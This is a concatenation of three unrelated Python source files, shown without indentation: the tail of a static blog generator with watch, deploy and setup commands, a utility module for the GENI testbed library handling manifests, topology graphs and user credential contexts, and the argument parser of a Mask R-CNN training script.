if event.src_path[:8] != "./build/" \
and len(split_filename) == 2 \
and split_filename[1][1:] in ["html", "css", "js", "md"]:
cnsl.warn(
"Source file {} changed, recompiling...\n".format(event.src_path))
try:
compile()
except Exception as e:
cnsl.error("Something went wrong trying to compile: " + e)
else:
cnsl.warn("Ignoring change in file {}".format(event.src_path))
class SiteHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def translate_path(self, path):
""" This is an old-style class, so can't super :-( """
path = posixpath.normpath(urllib.parse.unquote(path))
words = path.split('/')
words = [_f for _f in words if _f]
path = "site"
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def watch():
"""
Recompile the blog any time a file changes.
"""
compile()
cnsl.ok("Watching for file changes")
observer = Observer()
observer.schedule(ReloadHandler(), ".", recursive=True)
observer.start()
port = config.get("port", 8000)
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", port), SiteHTTPRequestHandler)
http = threading.Thread(target=httpd.serve_forever)
cnsl.ok("Starting webserver on port {}".format(port))
http.start()
webbrowser.open("http://localhost:{}/".format(port))
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
httpd.shutdown()
cnsl.ok("Stopped webserver on port {}".format(port))
cnsl.ok("Stopped watching for file changes")
http.join()
observer.join()
def deploy():
"""
Deploy your site to a cloud service.
You must have specified a service provider, container name,
and access credentials in config.yml,
"""
compile()
try:
service = config["deploy"]["service"]
except:
cnsl.error("You must specify a service to deploy to in config.yml")
return
try:
CloudFiles = get_driver(getattr(Provider, service))
except:
cnsl.error(
"The storage provider config is not valid. The available providers are as follows:")
cnsl.error(
', '.join([name for name in list(vars(Provider).keys()) if name[:2] != "__"]))
return
try:
if "aws-region" in config["deploy"]:
cnsl.ok("Connecting to region {}".format(config["deploy"]["aws-region"]))
driver = CloudFiles(
config["deploy"]["access-key"], config["deploy"]["secret-key"], region=config["deploy"]["aws-region"])
else:
driver = CloudFiles(
config["deploy"]["access-key"], config["deploy"]["secret-key"])
except Exception as e:
cnsl.error("Could not connect to storage service because: {}".format(e))
return
try:
container = driver.get_container(
container_name=config["deploy"]["container-name"])
cnsl.success("Loaded container {} from {}".format(
container.name, container.driver.name))
except ContainerDoesNotExistError:
cnsl.warn(
"Could not load container {}, trying to create it".format(container.name))
try:
container = driver.create_container(container_name=container)
cnsl.success("Created container {}".format(container.name))
except Exception as e:
cnsl.error("Could not create bucket because: {}".format(e))
return
except Exception as e:
cnsl.error("Could not load container {} because: {}".format(
config["deploy"]["container-name"], e))
return
# These operations are supported by some providers, so try each in turn
try:
driver.ex_enable_static_website(container=container)
cnsl.success("Enabled static website hosting")
except:
cnsl.warn(
"Could not enable static website hosting, you may have to do this manually")
try:
driver.enable_container_cdn(container=container)
cnsl.success("Enabled cdn")
except:
cnsl.warn("Could not enable cdn, you may have to do this manually")
# TODO driver.ex_set_error_page(container=container, file_name='error.html')
for root, dirs, files in os.walk(build_dir):
for filename in files:
full_filename = os.path.join(root, filename)
# Remove deploy directory prefix
full_path = os.path.join(*full_filename.split(os.sep)[1:])
if "S3" in container.driver.name:
extra = {"acl": "public-read"}
else:
# TODO test with all other services
extra = {}
try:
driver.upload_object(
file_path=full_filename,
container=container,
extra=extra,
object_name=full_path)
cnsl.success("Uploaded " + full_path)
except Exception as e:
cnsl.error("Could not upload {}, because: {}".format(full_path, e))
cnsl.success("Site successfully uploaded to container {} on {}".format(
container.name, container.driver.name))
try:
cnsl.ok('All done you can view the website at: ' +
driver.get_container_cdn_url(container=container))
except:
pass
def setup():
"""
Setup your config.yml file interactively.
"""
if os.path.exists('config.yml'):
cnsl.warn("Setting up blog, but config file already exists")
cnsl.warn("Existing config will be overwritten, or ctrl+c to exit")
title = input(
"\nPlease enter a title for your blog (you can change this later): \n")
subtitle = input("\nPlease enter a subtitle for your blog: \n")
with open('config.sample.yml') as sample_file:
sample = sample_file.read()
modified = ""
for line in sample.split("\n"):
if line.startswith("blog-title"):
modified += 'blog-title: "{}"'.format(
title.replace('\\', "\\\\").replace('"', '\\"'))
elif line.startswith("blog-subtitle"):
modified += 'blog-subtitle: "{}"'.format(
subtitle.replace('\\', "\\\\").replace('"', '\\"'))
else:
modified += line
modified += "\n"
with open('config.yml', 'w') as config_file:
config_file.write(modified)
cnsl.success("Config file written")
cnsl.ok("Welcome to Mirage. Write posts as markdown files in /posts.")
cnsl.ok("Run ./mirage compile to compile your blog.")
cnsl.ok("Run ./mirage help for more information.")
# CLI
parser = argh.ArghParser()
parser.add_commands([compile, watch, deploy, setup])
# parser.set_default_command(compile)
if __name__ == '__main__':
cnsl.header()
parser.dispatch()
|
util.py
|
# Copyright (c) 2014-2018 Barnstormer Softworks, Ltd.
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function
import datetime
import json
import multiprocessing as MP
import os
import os.path
import shutil
import subprocess
import tempfile
import time
import traceback as tb
import zipfile
import six
from .aggregate.apis import ListResourcesError, DeleteSliverError
def _getdefault (obj, attr, default):
if hasattr(obj, attr):
return obj[attr]
return default
def checkavailrawpc (context, am):
"""Returns a list of node objects representing available raw PCs at the
given aggregate."""
avail = []
ad = am.listresources(context)
for node in ad.nodes:
if node.exclusive and node.available:
if "raw-pc" in node.sliver_types:
avail.append(node)
return avail
def _corelogininfo (manifest):
from .rspec.vtsmanifest import Manifest as VTSM
from .rspec.pgmanifest import Manifest as PGM
linfo = []
if isinstance(manifest, PGM):
for node in manifest.nodes:
linfo.extend([(node.client_id, x.username, x.hostname, x.port) for x in node.logins])
elif isinstance(manifest, VTSM):
for container in manifest.containers:
linfo.extend([(container.client_id, x.username, x.hostname, x.port) for x in container.logins])
return linfo
def printlogininfo (context = None, am = None, slice = None, manifest = None):
"""Prints out host login info in the format:
::
[client_id][username] hostname:port
If a manifest object is provided the information will be mined from this data,
otherwise you must supply a context, slice, and am and a manifest will be
requested from the given aggregate."""
if not manifest:
manifest = am.listresources(context, slice)
info = _corelogininfo(manifest)
for line in info:
print("[%s][%s] %s: %d" % (line[0], line[1], line[2], line[3]))
# You can't put very much information in a queue before you hang your OS
# trying to write to the pipe, so we only write the paths and then load
# them again on the backside
def _mp_get_manifest (context, site, slc, q):
try:
# Don't use geni.tempfile here - we don't want them deleted when the child process ends
# TODO: tempfiles should get deleted when the parent process picks them back up
mf = site.listresources(context, slc)
tf = tempfile.NamedTemporaryFile(delete=False)
tf.write(mf.text)
path = tf.name
tf.close()
q.put((site.name, slc, path))
except ListResourcesError:
q.put((site.name, slc, None))
except Exception:
tb.print_exc()
q.put((site.name, slc, None))
def getManifests (context, ams, slices):
"""Returns a two-level dictionary of the form:
::
{slice_name : { site_object : manifest_object, ... }, ...}
Containing the manifests for all provided slices at all the provided
sites. Requests are made in parallel and the function blocks until the
slowest site returns (or times out)."""
sitemap = {}
for am in ams:
sitemap[am.name] = am
q = MP.Queue()
for site in ams:
for slc in slices:
p = MP.Process(target=_mp_get_manifest, args=(context, site, slc, q))
p.start()
while MP.active_children():
time.sleep(0.5)
d = {}
while not q.empty():
(site,slc,mpath) = q.get()
if mpath:
am = sitemap[site]
data = open(mpath).read()
mf = am.amtype.parseManifest(data)
d.setdefault(slc, {})[sitemap[site]] = mf
return d
def _mp_get_advertisement (context, site, q):
try:
ad = site.listresources(context)
q.put((site.name, ad))
except Exception:
q.put((site.name, None))
def getAdvertisements (context, ams):
"""Returns a dictionary of the form:
::
{ site_object : advertisement_object, ...}
Containing the advertisements for all the requested aggregates. Requests
are made in parallel and the function blocks until the slowest site
returns (or times out).
.. warning::
Particularly large advertisements may break the shared memory queue
used by this function."""
q = MP.Queue()
for site in ams:
p = MP.Process(target=_mp_get_advertisement, args=(context, site, q))
p.start()
while MP.active_children():
time.sleep(0.5)
d = {}
while not q.empty():
(site,ad) = q.get()
d[site] = ad
return d
def deleteSliverExists(am, context, slice):
"""Attempts to delete all slivers for the given slice at the given AM, suppressing all returned errors."""
try:
am.deletesliver(context, slice)
except DeleteSliverError:
pass
def _buildaddot(ad, drop_nodes = None):
"""Constructs a dotfile of a topology described by an advertisement rspec. Only works on very basic GENIv3 advertisements,
and probably has lots of broken edge cases."""
# pylint: disable=too-many-branches
if not drop_nodes:
drop_nodes = []
dot_data = []
dda = dot_data.append # Save a lot of typing
dda("graph {")
for node in ad.nodes:
if node.name in drop_nodes:
continue
if node.available:
dda("\"%s\"" % (node.name))
else:
dda("\"%s\" [style=dashed]" % (node.name))
for link in ad.links:
if not len(link.interface_refs) == 2:
print("Link with more than 2 interfaces:")
print(link.text)
name_1 = link.interface_refs[0].split(":")[-2].split("+")[-1]
name_2 = link.interface_refs[1].split(":")[-2].split("+")[-1]
if name_1 in drop_nodes or name_2 in drop_nodes:
continue
dda("\"%s\" -- \"%s\"" % (name_1, name_2))
dda("}")
return "\n".join(dot_data)
def builddot (manifests):
"""Constructs a dotfile of the topology described in the passed in manifest list and returns it as a string."""
# pylint: disable=too-many-branches
from .rspec import vtsmanifest as VTSM
from .rspec.pgmanifest import Manifest as PGM
dot_data = []
dda = dot_data.append # Save a lot of typing
dda("digraph {")
for manifest in manifests:
if isinstance(manifest, PGM):
intf_map = {}
for node in manifest.nodes:
dda("\"%s\" [label = \"%s\"]" % (node.sliver_id, node.name))
for interface in node.interfaces:
intf_map[interface.sliver_id] = (node, interface)
for link in manifest.links:
label = link.client_id
name = link.client_id
if link.vlan:
label = "VLAN\n%s" % (link.vlan)
name = link.vlan
dda("\"%s\" [label=\"%s\",shape=doublecircle,fontsize=11.0]" % (name, label))
for ref in link.interface_refs:
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (
intf_map[ref][0].sliver_id, name,
intf_map[ref][1].component_id.split(":")[-1]))
dda("\"%s\" -> \"%s\"" % (name, intf_map[ref][0].sliver_id))
elif isinstance(manifest, VTSM.Manifest):
for dp in manifest.datapaths:
dda("\"%s\" [shape=rectangle];" % (dp.client_id))
for ctr in manifest.containers:
dda("\"%s\" [shape=oval];" % (ctr.client_id))
dda("subgraph cluster_vf {")
dda("label = \"SSL VPNs\";")
dda("rank = same;")
for vf in manifest.functions:
if isinstance(vf, VTSM.SSLVPNFunction):
dda("\"%s\" [label=\"%s\",shape=hexagon];" % (vf.client_id, vf.note))
dda("}")
# TODO: We need to actually go through datapaths and such, but we can approximate for now
for port in manifest.ports:
if isinstance(port, VTSM.GREPort):
pass
elif isinstance(port, VTSM.PGLocalPort):
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.shared_vlan,
port.name))
dda("\"%s\" -> \"%s\"" % (port.shared_vlan, port.dpname))
elif isinstance(port, VTSM.InternalPort):
dp = manifest.findTarget(port.dpname)
if dp.mirror == port.client_id:
continue # The other side will handle it, oddly
# TODO: Handle mirroring into another datapath
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.remote_dpname,
port.name))
elif isinstance(port, VTSM.InternalContainerPort):
# Check to see if the other side is a mirror into us
dp = manifest.findTarget(port.remote_dpname)
if isinstance(dp, VTSM.ManifestDatapath):
if port.remote_client_id == dp.mirror:
remote_port_name = port.remote_client_id.split(":")[-1]
dda("\"%s\" -> \"%s\" [headlabel=\"%s\",taillabel=\"%s\",style=dashed]" % (
port.remote_dpname, port.dpname, port.name, remote_port_name))
continue
# No mirror, draw as normal
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.remote_dpname,
port.name))
elif isinstance(port, VTSM.VFPort):
dda("\"%s\" -> \"%s\"" % (port.dpname, port.remote_client_id))
dda("\"%s\" -> \"%s\"" % (port.remote_client_id, port.dpname))
elif isinstance(port, VTSM.GenericPort):
pass
else:
continue ### TODO: Unsupported Port Type
dda("}")
return "\n".join(dot_data)
class APIEncoder(json.JSONEncoder):
def default (self, obj): # pylint: disable=E0202
if hasattr(obj, "__json__"):
return obj.__json__()
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
def loadAggregates (path = None):
from .aggregate.spec import AMSpec
from . import _coreutil as GCU
if not path:
path = GCU.getDefaultAggregatePath()
ammap = {}
try:
obj = json.loads(open(path, "r").read())
for aminfo in obj["specs"]:
ams = AMSpec._jconstruct(aminfo)
am = ams.build()
if am:
ammap[am.name] = am
except IOError:
pass
return ammap
def updateAggregates (context, ammap):
from .aggregate.core import loadFromRegistry
new_map = loadFromRegistry(context)
for k,v in new_map.items():
if k not in ammap:
ammap[k] = v
saveAggregates(ammap)
def saveAggregates (ammap, path = None):
from . import _coreutil as GCU
if not path:
path = GCU.getDefaultAggregatePath()
obj = {"specs" : [x._amspec for x in ammap.values() if x._amspec]}
with open(path, "w+") as f:
data = json.dumps(obj, cls=APIEncoder)
f.write(data)
def loadContext (path = None, key_passphrase = None):
import geni._coreutil as GCU
from geni.aggregate import FrameworkRegistry
from geni.aggregate.context import Context
from geni.aggregate.user import User
if path is None:
path = GCU.getDefaultContextPath()
else:
path = os.path.expanduser(path)
obj = json.load(open(path, "r"))
version = _getdefault(obj, "version", 1)
if key_passphrase is True:
import getpass
key_passphrase = getpass.getpass("Private key passphrase: ")
if version == 1:
cf = FrameworkRegistry.get(obj["framework"])()
cf.cert = obj["cert-path"]
if key_passphrase:
if six.PY3:
key_passphrase = bytes(key_passphrase, "utf-8")
cf.setKey(obj["key-path"], key_passphrase)
else:
cf.key = obj["key-path"]
user = User()
user.name = obj["user-name"]
user.urn = obj["user-urn"]
user.addKey(obj["user-pubkeypath"])
context = Context()
context.addUser(user)
context.cf = cf
context.project = obj["project"]
context.path = path
elif version == 2:
context = Context()
fobj = obj["framework-info"]
cf = FrameworkRegistry.get(fobj["type"])()
cf.cert = fobj["cert-path"]
if key_passphrase:
cf.setKey(fobj["key-path"], key_passphrase)
else:
cf.key = fobj["key-path"]
context.cf = cf
context.project = fobj["project"]
context.path = path
ulist = obj["users"]
for uobj in ulist:
user = User()
user.name = uobj["username"]
user.urn = _getdefault(uobj, "urn", None)
klist = uobj["keys"]
for keypath in klist:
user.addKey(keypath)
context.addUser(user)
from cryptography import x509
from cryptography.hazmat.backends import default_backend
cert = x509.load_pem_x509_certificate(open(context._cf.cert, "rb").read(), default_backend())
if cert.not_valid_after < datetime.datetime.now():
print("***WARNING*** Client SSL certificate supplied in this context is expired")
return context
def hasDataContext ():
import geni._coreutil as GCU
path = GCU.getDefaultContextPath()
return os.path.exists(path)
class MissingPublicKeyError(Exception):
def __str__ (self):
return "Your bundle does not appear to contain an SSH public key. You must supply a path to one."
class PathNotFoundError(Exception):
def __init__ (self, path):
super(PathNotFoundError, self).__init__()
self._path = path
def __str__ (self):
return "The path %s does not exist." % (self._path)
def _find_ssh_keygen ():
PATHS = ["/usr/bin/ssh-keygen", "/bin/ssh-keygen", "/usr/sbin/ssh-keygen", "/sbin/ssh-keygen"]
for path in PATHS:
if os.path.exists(path):
return path
MAKE_KEYPAIR = (-1, 1)
def buildContextFromBundle (bundle_path, pubkey_path = None, cert_pkey_path = None):
import geni._coreutil as GCU
HOME = os.path.expanduser("~")
# Create the .bssw directories if they don't exist
DEF_DIR = GCU.getDefaultDir()
zf = zipfile.ZipFile(os.path.expanduser(bundle_path))
zip_pubkey_path = None
if pubkey_path is None or pubkey_path == MAKE_KEYPAIR:
# search for pubkey-like file in zip
for fname in zf.namelist():
if fname.startswith("ssh/public/") and fname.endswith(".pub"):
zip_pubkey_path = fname
break
if not zip_pubkey_path and pubkey_path != MAKE_KEYPAIR:
raise MissingPublicKeyError()
# Get URN/Project/username from omni_config
urn = None
project = None
oc = zf.open("omni_config")
for l in oc.readlines():
if l.startswith("urn"):
urn = l.split("=")[1].strip()
elif l.startswith("default_project"):
project = l.split("=")[1].strip()
uname = urn.rsplit("+")[-1]
# Create .ssh if it doesn't exist
try:
os.makedirs("%s/.ssh" % (HOME), 0o775)
except OSError:
pass
# If a pubkey wasn't supplied on the command line, we may need to install both keys from the bundle
# This will catch if creation was requested but failed
pkpath = pubkey_path
if not pkpath or pkpath == MAKE_KEYPAIR:
found_private = False
if "ssh/private/id_geni_ssh_rsa" in zf.namelist():
found_private = True
if not os.path.exists("%s/.ssh/id_geni_ssh_rsa" % (HOME)):
# If your umask isn't already 0, we can't safely create this file with the right permissions
with os.fdopen(os.open("%s/.ssh/id_geni_ssh_rsa" % (HOME), os.O_WRONLY | os.O_CREAT, 0o600), "w") as tf:
tf.write(zf.open("ssh/private/id_geni_ssh_rsa").read())
if zip_pubkey_path:
pkpath = "%s/.ssh/%s" % (HOME, zip_pubkey_path[len('ssh/public/'):])
if not os.path.exists(pkpath):
with open(pkpath, "w+") as tf:
tf.write(zf.open(zip_pubkey_path).read())
# If we don't find a proper keypair, we'll make you one if you asked for it
# This preserves your old pubkey if it existed in case you want to use that later
if not found_private and pubkey_path == MAKE_KEYPAIR:
keygen = _find_ssh_keygen()
subprocess.call("%s -t rsa -b 2048 -f ~/.ssh/genilib_rsa -N ''" % (keygen), shell = True)
pkpath = os.path.expanduser("~/.ssh/genilib_rsa.pub")
else:
pkpath = os.path.expanduser(pubkey_path)
if not os.path.exists(pkpath):
raise PathNotFoundError(pkpath)
# We write the pem into 'private' space
zf.extract("geni_cert.pem", DEF_DIR)
if cert_pkey_path is None:
ckpath = "%s/geni_cert.pem" % (DEF_DIR)
else:
# Use user-provided key path instead of key inside .pem
ckpath = os.path.expanduser(cert_pkey_path)
if not os.path.exists(ckpath):
raise PathNotFoundError(ckpath)
cdata = {}
cdata["framework"] = "portal"
cdata["cert-path"] = "%s/geni_cert.pem" % (DEF_DIR)
cdata["key-path"] = ckpath
cdata["user-name"] = uname
cdata["user-urn"] = urn
cdata["user-pubkeypath"] = pkpath
cdata["project"] = project
json.dump(cdata, open("%s/context.json" % (DEF_DIR), "w+"))
def _buildContext (framework, cert_path, key_path, username, user_urn, pubkey_path, project, path=None):
import geni._coreutil as GCU
# Create the .bssw directories if they don't exist
DEF_DIR = GCU.getDefaultDir()
new_cert_path = "%s/%s" % (DEF_DIR, os.path.basename(cert_path))
shutil.copyfile(cert_path, new_cert_path)
if key_path != cert_path:
new_key_path = "%s/%s" % (DEF_DIR, os.path.basename(key_path))
shutil.copyfile(key_path, new_key_path)
else:
new_key_path = new_cert_path
if not path:
path = "%s/context.json" % (DEF_DIR)
cdata = {}
cdata["framework"] = framework
cdata["cert-path"] = new_cert_path
cdata["key-path"] = new_key_path
cdata["user-name"] = username
cdata["user-urn"] = user_urn
cdata["user-pubkeypath"] = pubkey_path
cdata["project"] = project
json.dump(cdata, open(path, "w+"))
|
main.py
|
# coding=utf-8
# main script for training and testing mask rcnn on MSCOCO dataset
# multi gpu version
import sys, os, argparse
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # so here won't have poll allocator info
# solve the issue of a bug in while loop, when you import the graph in multi-gpu, prefix is not added in while loop op # https://github.com/tensorflow/tensorflow/issues/26526
os.environ['TF_ENABLE_CONTROL_FLOW_V2'] = '1'
# remove all the annoying warnings from tf v1.10 to v1.13
import logging
logging.getLogger('tensorflow').disabled = True
import numpy as np
import cv2
from models import get_model
from trainer import Trainer
from tester import Tester
import math, time, json, random, operator
import pickle
import tensorflow as tf
import pycocotools.mask as cocomask
from tqdm import tqdm
from models import pack, initialize
from nn import resizeImage, fill_full_mask
from utils import evalcoco, match_detection, computeAP, computeAR, computeAR_2, grouper, gather_dt, gather_gt, match_dt_gt, gather_act_singles, aggregate_eval, weighted_average
from utils import Dataset, Summary, nms_wrapper, FIFO_ME
from pycocotools.coco import COCO
# for using a COCO model to finetuning with DIVA data.
from class_ids import targetClass1to1, targetClass2id, targetAct2id,targetAct2id_wide,targetAct2id_tall, targetSingleAct2id, targetPairAct2id,targetClass2id_tall,targetClass2id_wide,targetClass2id_wide_v2,targetClass2id_mergeProp,targetClass2id_new,targetClass2id_new_nopo, targetAct2id_bupt, bupt_act_mapping, targetAct2id_meva, meva_act_mapping, coco_obj_class_to_id, coco_obj_id_to_class, coco_obj_to_actev_obj
targetid2class = {targetClass2id[one]:one for one in targetClass2id}
targetactid2class = {targetAct2id[one]:one for one in targetAct2id}
targetsingleactid2class = {targetSingleAct2id[one]:one for one in targetSingleAct2id}
eval_target = {
"Vehicle":["car","motorcycle","bus","truck","vehicle"],
"Person":"person",
}
eval_best = "Person" # not used anymore, we use average as the best metric
def get_args():
global targetClass2id, targetid2class
parser = argparse.ArgumentParser()
parser.add_argument("datajson")
parser.add_argument("imgpath")
parser.add_argument("--log_time_and_gpu", action="store_true")
parser.add_argument("--outbasepath",type=str,default=None,help="full path will be outbasepath/modelname/runId")
parser.add_argument("--actoutbasepath",type=str,default=None,help="for activity box forward only")
parser.add_argument("--train_skip",type=int,default=1,help="when load diva train set, skip how many.")
parser.add_argument("--train_skip_offset",type=int,default=0,help="when load diva train set, offset before skip")
parser.add_argument("--val_skip",type=int,default=1,help="when load diva val set, skip how many.")
parser.add_argument("--val_skip_offset",type=int,default=0,help="when load diva train set, offset before skip")
parser.add_argument("--exit_after_val",action="store_true")
parser.add_argument("--forward_skip",type=int,default=1,help="forward, skip how many.")
parser.add_argument("--use_two_level_outpath", action="store_true")
parser.add_argument("--start_from",type=int,default=0,help="forward, start from which batch")
parser.add_argument("--modelname",type=str,default=None)
parser.add_argument("--num_class",type=int,default=81,help="num catagory + 1 background")
# ---- for training, show losses' moving average
parser.add_argument("--show_loss_period", type=int, default=1000)
parser.add_argument("--loss_me_step", type=int, default=100, help="moving average queue size")
# ------ extract fpn feature of the whole image
parser.add_argument("--extract_feat",action="store_true")
parser.add_argument("--feat_path",default=None)
parser.add_argument("--just_feat",action="store_true",help="only extract full image feature no bounding box")
# ------ do object detection and extract the fpn feature for each *final* boxes
parser.add_argument("--get_box_feat",action="store_true")
parser.add_argument("--box_feat_path",default=None)
# ---different from above, only feat no object detection
parser.add_argument("--videolst",default=None)
parser.add_argument("--skip",action="store_true",help="skip existing npy")
parser.add_argument("--tococo",action="store_true",help="for training in diva using coco model, map diva class1to1 to coco")
parser.add_argument("--diva_class",action="store_true",help="the last layer is 16 (full) class output as the diva object classes")
parser.add_argument("--diva_class2",action="store_true",help="the last layer is new classes with person_object boxes")
parser.add_argument("--diva_class3",action="store_true",help="the last layer is new classes without person_object boxes")
parser.add_argument("--is_coco_model",action="store_true",help="")
parser.add_argument("--merge_prop",action="store_true",help="use annotation that merged prop and Push_Pulled_Object and train")
parser.add_argument("--use_bg_score",action="store_true")
# ------------activity detection
parser.add_argument("--act_as_obj",action="store_true",help="activity box as obj box")
parser.add_argument("--add_act",action="store_true",help="add activitiy model")
# 07/2019
parser.add_argument("--bupt_exp", action="store_true", help="bupt activity box exp")
parser.add_argument("--meva_exp", action="store_true", help="meva activity box exp")
parser.add_argument("--check_img_exist", action="store_true", help="check image exists when load data")
parser.add_argument("--fix_obj_model",action="store_true",help="fix the object detection part including rpn")
# v1:
parser.add_argument("--num_act_class",type=int,default=36,help="num catagory + 1 background")
parser.add_argument("--fastrcnn_act_fg_ratio",default=0.25,type=float)
parser.add_argument("--act_relation_nn",action="store_true",help="add relation link in activity fastrnn head")
parser.add_argument("--act_loss_weight",default=1.0,type=float)
# ----- activity detection version 2
parser.add_argument("--act_v2",action="store_true")
parser.add_argument("--act_single_topk",type=int,default=5,help="each box topk classes are output")
parser.add_argument("--num_act_single_class",default=36,type=int)
parser.add_argument("--num_act_pair_class",default=21,type=int)
# ---------------------------------------------
parser.add_argument("--debug",action="store_true",help="load fewer image for debug in training")
parser.add_argument("--runId",type=int,default=1)
# forward mode: imgpath is the list of images
# will output result to outbasepath
# forward still need a coco validation json to get the catgory names
parser.add_argument("--mode",type=str,default="forward",help="train | test | forward | boxfeat | givenbox")
parser.add_argument("--avg_feat",action="store_true",help="for boxfeat mode, output 7x7x2048 or just 2048 for each box")
parser.add_argument("--boxjsonpath",default=None,help="json contain a dict for all the boxes, imageId -> boxes")
parser.add_argument("--boxfeatpath",default=None,help="where to save the box feat path, will be a npy for each image")
parser.add_argument("--boxclass",action="store_true",help="do box classification as well")
parser.add_argument("--resnet152",action="store_true",help="")
parser.add_argument("--resnet50",action="store_true",help="")
parser.add_argument("--resnet34",action="store_true",help="")
parser.add_argument("--resnet18",action="store_true",help="")
parser.add_argument("--use_se",action="store_true",help="use squeeze and excitation in backbone")
parser.add_argument("--use_resnext", action="store_true")
parser.add_argument("--is_fpn",action="store_true")
parser.add_argument("--use_gn",action="store_true", help="whether to use group normalization")
parser.add_argument("--ignore_gn_vars",action="store_true", help="add gn to previous model, will ignore loading the gn var first")
parser.add_argument("--use_conv_frcnn_head", action="store_true",help="use conv in fastrcnn head")
parser.add_argument("--use_att_frcnn_head", action="store_true",help="use attention to sum [K, 7, 7, C] feature into [K, C]")
parser.add_argument("--use_frcnn_class_agnostic", action="store_true", help="use class agnostic fc head")
parser.add_argument("--conv_frcnn_head_dim", default=256, type=int)
parser.add_argument("--get_rpn_out", action="store_true")
parser.add_argument("--rpn_out_path",default=None)
parser.add_argument("--use_cpu_nms",action="store_true")
parser.add_argument("--no_nms", action="store_true", help="not using nms in the end, save all pre_nms_topk boxes;")
parser.add_argument("--save_all_box",action="store_true", help="for DCR experiment, save all boxes and scores in npz file")
parser.add_argument("--use_small_object_head", action="store_true")
parser.add_argument("--use_so_score_thres", action="store_true", help="use score threshold before final nms")
parser.add_argument("--oversample_so_img", action="store_true")
parser.add_argument("--oversample_x", type=int, default=1, help="x + 1 times")
parser.add_argument("--skip_no_so_img", action="store_true")
parser.add_argument("--skip_no_object", default=None,help="'Bike', single object annotation filter")
parser.add_argument("--so_outpath",default=None)
parser.add_argument("--use_so_association", action="store_true")
parser.add_argument("--so_person_topk",type=int,default=10)
parser.add_argument("--freeze_rpn", action="store_true")
parser.add_argument("--freeze_fastrcnn", action="store_true")
parser.add_argument("--use_dilations", action="store_true", help="use dilations=2 in res5")
parser.add_argument("--use_deformable", action="store_true", help="use dilations=2 in res5")
parser.add_argument("--fpn_frcnn_fc_head_dim",type=int,default=1024)
parser.add_argument("--fpn_num_channel",type=int,default=256)
parser.add_argument("--freeze",type=int,default=0,help="freeze backbone resnet until group 0|2")
parser.add_argument("--finer_resolution",action="store_true",help="fpn use finer resolution conv")
parser.add_argument("--add_relation_nn",action="store_true",help="add relation network feature")
parser.add_argument("--focal_loss",action="store_true",help="use focal loss for RPN and FasterRCNN loss, instead of cross entropy")
# for test mode on testing on the MSCOCO dataset, if not set this, will use our evaluation script
parser.add_argument("--use_coco_eval",action="store_true")
parser.add_argument("--coco2014_to_2017",action="store_true",help="if use the cocoval 2014 json and use val2017 filepath, need this option to get the correct file path")
# this will alter some parameter in tf.pad in resnet bottleneck and resnet conv4,
## In tensorpack model zoo, ResNet models with TF_PAD_MODE=False are marked with "-AlignPadding".
# All other models under `ResNet/` in the model zoo are trained with TF_PAD_MODE=True.
# _C.BACKBONE.TF_PAD_MODE = False
#parser.add_argument("--new_tensorpack_model",action="store_true",help="for new tensorpack model, the fast rcnn box logit has num_class instead of num_class-1, and some padding is different")
parser.add_argument("--trainlst",type=str,default=None,help="training frame name list,")
parser.add_argument("--valframepath",type=str,default=None,help="path to top frame path")
parser.add_argument("--annopath",type=str,default=None,help="path to annotation, each frame.npz")
parser.add_argument("--valannopath",type=str,default=None,help="path to annotation, each frame.npz")
parser.add_argument("--flip_image",action="store_true",help="for training, whether to random horizontal flipping for input image, maybe not for surveillance video")
parser.add_argument("--add_mask",action="store_true")
parser.add_argument("--vallst",type=str,default=None,help="validation for training")
parser.add_argument("--load",action="store_true")
parser.add_argument("--load_best",action="store_true")
parser.add_argument("--skip_first_eval",action="store_true")
parser.add_argument("--best_first",type=float,default=None)
parser.add_argument("--force_first_eval",action="store_true")
parser.add_argument("--no_skip_error",action="store_true")
parser.add_argument("--show_stat",action="store_true",help="show data distribution only")
# use for pre-trained model
parser.add_argument("--load_from",type=str,default=None)
parser.add_argument("--ignore_vars",type=str,default=None,help="variables to ignore, multiple seperate by : like: logits/W:logits/b, this var only need to be var name's sub string to ignore")
parser.add_argument("--print_params",action="store_true",help="print params and then exit")
parser.add_argument("--show_restore",action="store_true",help="load from existing model (npz), show the weight that is restored")
# -------------------- save model for deployment
parser.add_argument("--is_pack_model",action="store_true",default=False,help="with is_test, this will pack the model to a path instead of testing")
parser.add_argument("--pack_model_path",type=str,default=None,help="path to save model, a .pb file")
parser.add_argument("--note",type=str,default=None,help="leave a note for this packed model for future reference")
parser.add_argument("--pack_modelconfig_path", type=str, default=None, help="json file to save the config and note")
# forward with frozen gragp
parser.add_argument("--is_load_from_pb", action="store_true")
# ------------------------------------ model specifics
# ----------------------------------training detail
parser.add_argument("--use_all_mem",action="store_true")
parser.add_argument('--im_batch_size',type=int,default=1)
parser.add_argument("--rpn_batch_size",type=int,default=256,help="num roi per image for RPN training")
parser.add_argument("--frcnn_batch_size",type=int,default=512,help="num roi per image for fastRCNN training")
parser.add_argument("--rpn_test_post_nms_topk",type=int,default=1000,help="test post nms, input to fast rcnn")
# fastrcnn output NMS suppressing iou >= this thresZ
parser.add_argument("--fastrcnn_nms_iou_thres",type=float,default=0.5)
parser.add_argument("--max_size",type=int,default=1333,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--short_edge_size",type=int,default=800,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--scale_jitter",action="store_true",help="if set this, will random get int from min to max to resize image;original param will still be used in testing")
parser.add_argument("--short_edge_size_min",type=int,default=640,help="num roi per image for RPN and fastRCNN training")
parser.add_argument("--short_edge_size_max",type=int,default=800,help="num roi per image for RPN and fastRCNN training")
# ------------------------------mixup training
